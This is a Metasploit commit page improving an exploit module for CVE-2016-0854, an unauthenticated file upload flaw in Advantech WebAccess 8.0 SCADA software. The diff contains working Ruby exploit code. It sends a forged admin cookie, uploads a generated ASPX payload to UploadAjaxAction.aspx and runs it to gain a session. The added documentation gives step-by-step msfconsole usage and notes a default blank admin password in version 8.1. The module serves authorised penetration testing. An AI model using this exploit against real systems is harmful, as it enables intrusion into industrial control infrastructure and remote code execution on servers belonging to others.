Land #6874, Improve exploit for CVE-2016-0854

rapid7 · May 14, 2016 · 21d74a6 · 21d74a6
2 parents c7cbaa0 + 0d176f2
commit 21d74a6
Show file tree

Hide file tree

Showing 2 changed files with 77 additions and 16 deletions.
diff --git a/...tion/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload.md b/...tion/modules/exploit/windows/scada/advantech_webaccess_dashboard_file_upload.md
@@ -0,0 +1,36 @@
+Advantech WebAccess is a web-based software package for human-machine interfaces and supervisory
+control and data acquisition (SCADA). WebAccess 8.0 suffers from a vulnerability that allows an
+attacker to upload a malicious file onto the web server, and gain arbitrary code execution under
+the context of IIS APPPOOL\WADashboard_pool.
+
+## Vulnerable Application
+
+All builds of Advantech WebAccess 8.0 are affected:
+
+* [WebAccess 8.0 _20150816](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe)
+* [WebAccess 8.0 _20141103](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20141103_3.4.3.exe)
+
+For exploitation, there is a difference between the two versions. The 2014 version of WebAccess 8.0
+had two upload actions in the UploadAjaxAction class: uploadBannerImage, and uploadImageCommon. The
+2015 version of WebAccess 8.0 added another upload action: uploadFile. This exploit uses the
+uploadImageCommon action because it works for both.
+
+Advantech WebAccess 8.1 mitigated the vulnerability by enforcing authentication for
+UploadAjaxAction. However, keep in mind that WebAccess 8.1 comes with a default credential of
+user name "admin" with a blank password, which means the user is likely still at risk by using the
+default configuration.
+
+advantech_webaccess_dashboard_file_upload will not attempt to exploit WebAccess 8.1.
+
+## Verification Steps
+
+1. Start a Windows machine (such as Windows 7 SP1).
+2. To install Advantech WebAccess, make sure to install the Internet Information Services Windows
+   feature.
+3. Download WebAccess 8.0, and install it. After installation, make sure the web application is
+   operational by accessing with a browser (on port 80).
+4. Start msfconsole
+5. Do: ```use exploit/windows/scada/advantech_webaccess_dashboard_file_upload```
+6. Do: ```set RHOST [TARGET_IP]```
+7. Set other options if needed
+8. Do: ```exploit```, and you should get a session.
diff --git a/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb b/modules/exploits/windows/scada/advantech_webaccess_dashboard_file_upload.rb
@@ -9,10 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+      'Name'           => "Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload",
       'Description'    => %q{
          This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
 
@@ -27,7 +28,8 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'Author'         => [
         'rgod', # Vulnerability discovery
-        'Zhou Yu <504137480[at]qq.com>' # MSF module
+        'Zhou Yu <504137480[at]qq.com>', # MSF module
+        'sinn3r' # Explicit check && better support of 8.0 (2014 and 2015)
       ],
       'References'     => [
         [ 'CVE', '2016-0854' ],
@@ -49,35 +51,45 @@ def initialize(info = {})
       ], self.class)
   end
 
-  def version_match(data)
-    # Software Build : 8.0-2015.08.15
-    fingerprint = data.match(/Software\sBuild\s:\s(?<version>\d{1,2}\.\d{1,2})-(?<year>\d{4})\.(?<month>\d{1,2})\.(?<day>\d{1,2})/)
-    fingerprint['version'] unless fingerprint.nil?
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
   end
 
   def vuln_version?
-    res = send_request_cgi!(
-      'method'   => 'GET',
-      'uri'      => target_uri.to_s
+    uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
+
+    data = Rex::MIME::Message.new
+    # If we can access the uploadImageCommon action name, that indicates the server is vulnerable
+    # to our attack. The "patched" version requires authentication, so we don't have access to
+    # the action name.
+    data.add_part('uploadImageCommon', nil, nil, 'form-data; name="actionName"')
+
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uri,
+      'cookie'  => "waUserName=admin",
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s
     )
 
-    ver = res && res.body ? version_match(res.body) : nil
-    true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
+    res = res.get_json_document
+    res['resStatus'] && res['resStatus'] == '1'
   end
 
   def check
     if vuln_version?
-      Exploit::CheckCode::Appears
+      Exploit::CheckCode::Vulnerable
     else
       Exploit::CheckCode::Safe
     end
   end
 
   def upload_file?(filename, file)
+    print_status("Uploading: #{filename}")
     uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
 
     data = Rex::MIME::Message.new
-    data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
+    data.add_part('uploadImageCommon', nil, nil, 'form-data; name="actionName"')
     data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
 
     res = send_request_cgi(
@@ -87,7 +99,19 @@ def upload_file?(filename, file)
       'ctype'   => "multipart/form-data; boundary=#{data.bound}",
       'data'    => data.to_s
     )
-    true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#{filename}\"}") : false
+
+    if res.get_json_document.empty?
+      false
+    else
+      # Only register when we know the upload was successful.
+      #
+      # When we get a session, we start at:
+      # c:\windows\system32\inetsrv
+      # But our malicious file is at C:\Inetpub\wwwroot\broadweb\WADashboard
+      register_file_for_cleanup("../../../Inetpub/wwwroot/broadweb/WADashboard/#{filename}")
+
+      true
+    end
   end
 
   def exec_file?(filename)
@@ -103,14 +127,15 @@ def exec_file?(filename)
       'uri'      => uri,
       'cookie'   => res.get_cookies
     )
-    true ? res && res.code == 200 : false
+    res && res.code == 200
   end
 
   def exploit
     unless vuln_version?
-      print_status("#{peer} - Cannot reliably check exploitability.")
+      print_status('Target is not vulnerable.')
       return
     end
+
     filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
     filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)